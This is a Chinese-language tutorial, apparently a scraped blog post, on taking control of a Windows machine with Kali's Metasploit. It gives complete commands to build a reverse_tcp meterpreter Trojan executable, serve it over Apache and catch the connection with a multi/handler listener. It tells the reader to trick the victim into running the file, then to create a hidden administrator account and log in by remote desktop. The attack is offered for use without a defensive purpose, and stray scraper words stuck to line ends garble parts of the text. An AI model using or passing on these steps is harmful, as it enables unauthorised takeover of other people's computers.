使用Kali中的Metasploit生成木馬控制Windows系統

1、概念:Kali基於debin的數字取證系統,上面集成了不少滲透測試工具,其前身是BT5 R3(BtackTrack)。
  其中Metasploit是一個綜合利用工具,極大的提升了攻擊者的滲透效率,使用Ruby開發的,使用很是方便,進入該工具的方式:msfconsole ,MSF依賴於Postgresql數據庫,在使用MSF以前要開啓數據庫。html

2、步驟:sql

  Step1:生成木馬,msfvenomshell

msfvenom -p windows/meterpreter/reverse_tcp lhost=Kali的IP lport=5555 -f exe >/root/Desktop/evilshell.exe

      -p 參數後跟上payload,攻擊成功後要作什麼事情
      lhost 後跟監聽的IP
      lpost 後跟監聽端口
      -f 後跟要生成後門文件的類型
      >重定向數據庫

    

  Step2:將生成的木馬文件evilshell.exe 拷貝到/var/www/html,開啓apache服務,在肉雞上打開瀏覽器,訪問該站點(Kali的IP),下載木馬文件。apache

cp evilshell.exe /var/www/html/
service apache2 start

  

  Step3:開啓MSF,提早查看postgresql運行狀態 msfconsolewindows

ps -aux |grep postgresql

  

msfconsole

  

      exploits:開發利用,用來攻擊某些服務、平臺、系統等用到的工具
      payload:載荷載體,攻擊成功後要操做什麼瀏覽器

    輸入如下命令bash

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp(選擇木馬時選的payload)
msf5 exploit(multi/handler) > show options
msf5 exploit(multi/handler) > set lhost kali的IP
msf5 exploit(multi/handler) > set lpost 5555
msf5 exploit(multi/handler) > run(或者exploit)

  

   

  Step4:在肉雞中誘導用戶點擊exe程序(社會工程學攻擊),在Kali中就會獲得肉雞的shell(meterpreter)tcp

msf5 exploit(multi/handler) > run

  

   Step5:如今就能夠給肉雞添加用戶了工具

net user
net user hacker$ /add  
net user hacker$ 123.com
net localgroup administrators hacker$ /add 添加到管理員組
net user hacker$

  

   Step6:遠程登陸肉雞計算機

rdesktop + windows的IP

  

   

   

 至此,使用Kali控制Windows成功!

相關文章
相關標籤/搜索